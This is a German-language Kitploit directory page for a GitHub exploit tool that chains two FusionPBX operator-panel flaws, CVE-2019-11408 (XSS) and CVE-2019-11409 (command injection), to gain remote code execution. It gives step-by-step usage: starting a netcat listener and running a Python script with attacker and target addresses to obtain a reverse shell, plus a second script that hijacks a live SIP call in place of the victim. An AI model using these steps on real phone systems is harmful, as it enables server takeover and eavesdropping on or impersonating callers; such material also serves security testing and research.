Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
fusionpbx_rce_vulnerability — Kette CVE-2019-11408 – XSS im Bedienfeld und CVE-2019-11409 – Befehlseinschleusung im Bedienfeld. | Kitploit
Tools/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

Kette CVE-2019-11408 – XSS im Bedienfeld und CVE-2019-11409 – Befehlseinschleusung im Bedienfeld.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Einleitung

Dieser einfache Code versucht, die Implementierung der verketteten Sicherheitslücke abzuschließen, die von Dustin Cobb bei RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX vorgestellt wurde.

RCE

Reproduktionsschritte

  1. Zeigen Sie den anfälligen Operator-Bildschirm in einem Webbrowser an, der sich in diesem Beispiel unter https://{fusionpbx_address}/app/operator_panel/index.php befindet.
  2. Starten Sie einen netcat-Listener auf einem entfernten System (rce_listener_address).`
  3. Führen Sie den folgenden Exploit-Code auf dem entfernten System in einem anderen Terminal-Fenster aus: python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. Der Exploit verbindet sich mit dem netcat-Listener und stellt eine Reverse-Shell bereit.

Einen Anruf ersetzen

Während wir Call-ID, from-tag und to-tag eines Anrufs kennen, wird durch Ausführen des folgenden Codes Sie anstelle des Opfers im Anruf ersetzt.

Reproduktionsschritte

  1. Stellen Sie zunächst einen Anruf zwischen zwei SIP-UA her.
  2. Nachdem der Anruf aufgebaut ist, müssen wir den dialog_identifier konstruieren, indem wir {Call-ID}{Semikolon}"to-teg:"{to-tag}"from-tag"{from-tag} verketten.
  3. Führen Sie den folgenden Hijacker-Code auf dem entfernten System aus und ersetzen Sie sich durch die Opfernummer. python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
Tool herunterladen